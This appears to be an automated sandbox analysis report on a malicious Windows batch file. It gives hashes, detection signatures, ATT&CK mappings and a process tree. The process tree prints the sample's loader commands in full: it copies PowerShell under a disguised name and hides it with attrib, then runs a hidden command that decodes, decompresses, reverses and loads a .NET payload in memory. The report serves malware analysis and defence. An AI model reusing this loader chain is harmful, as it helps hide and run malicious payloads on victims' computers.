Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    25-06-2024 01:39

General

  • Target

    98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat

  • Size

    2.9MB

  • MD5

    a65ee5594b619784ddae86580ae0023e

  • SHA1

    068ab505bb49206349b08527e88fa764475dc4e3

  • SHA256

    98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f

  • SHA512

    fa454fb624c12a7ceac9ba230134cb63df7321dcf09f5c077d7d94d82e0220fd04222b5f1ade571eb0154c716a284ccf802d76676dd0d6063e3da441dd7c056e

  • SSDEEP

    24576:qjdD5w0gCVEM/qU6ucJXtV5g+W1LAXuFyoU/Vgjt5Rxb85lepF+STTdA7jxkbLv8:2D71qdXt/3dKy4JrpFftkbWDoUAiVRTo

Score
8/10

Malware Config

Signatures

  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo F "
      2⤵
        PID:2260
      • C:\Windows\system32\xcopy.exe
        xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz
        2⤵
          PID:1736
        • C:\Windows\system32\attrib.exe
          attrib +s +h C:\Users\Admin\AppData\Local\Temp\98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz
          2⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:2072
        • C:\Users\Admin\AppData\Local\Temp\98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz
          C:\Users\Admin\AppData\Local\Temp\98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz -WindowStyle hidden -command "$Uizrmvoio = Get-Content 'C:\Users\Admin\AppData\Local\Temp\98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat' | select-object -Last 1; $Ubpyh = [System.Convert]::FromBase64String($Uizrmvoio);$Sfqzwt = New-Object System.IO.MemoryStream( , $Ubpyh );$Tcjzzfukost = New-Object System.IO.MemoryStream;$Umuaqpoo = New-Object System.IO.Compression.GzipStream $Sfqzwt, ([IO.Compression.CompressionMode]::Decompress);$Umuaqpoo.CopyTo( $Tcjzzfukost );$Umuaqpoo.Close();$Sfqzwt.Close();[byte[]] $Ubpyh = $Tcjzzfukost.ToArray();[Array]::Reverse($Ubpyh); $Nfaqarukpjv = [System.Threading.Thread]::GetDomain().Load($Ubpyh); $Kgtpyswwtxy = $Nfaqarukpjv.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
          2⤵
          • Executes dropped EXE
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2916

      Network

      MITRE ATT&CK Matrix ATT&CK v13

      Defense Evasion

      Hide Artifacts

      2
      T1564

      Hidden Files and Directories

      2
      T1564.001

      Discovery

      System Information Discovery

      1
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\98c9320cdb52678dceee4b16666147bd1d96f73006311c03f6238fcdf813f93f.bat.Uuz
        Filesize

        442KB

        MD5

        92f44e405db16ac55d97e3bfe3b132fa

        SHA1

        04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

        SHA256

        6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

        SHA512

        f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

      • memory/2916-5-0x0000000074381000-0x0000000074382000-memory.dmp
        Filesize

        4KB

      • memory/2916-6-0x0000000074380000-0x000000007492B000-memory.dmp
        Filesize

        5.7MB

      • memory/2916-7-0x0000000074380000-0x000000007492B000-memory.dmp
        Filesize

        5.7MB

      • memory/2916-8-0x0000000074380000-0x000000007492B000-memory.dmp
        Filesize

        5.7MB

      • memory/2916-9-0x0000000074380000-0x000000007492B000-memory.dmp
        Filesize

        5.7MB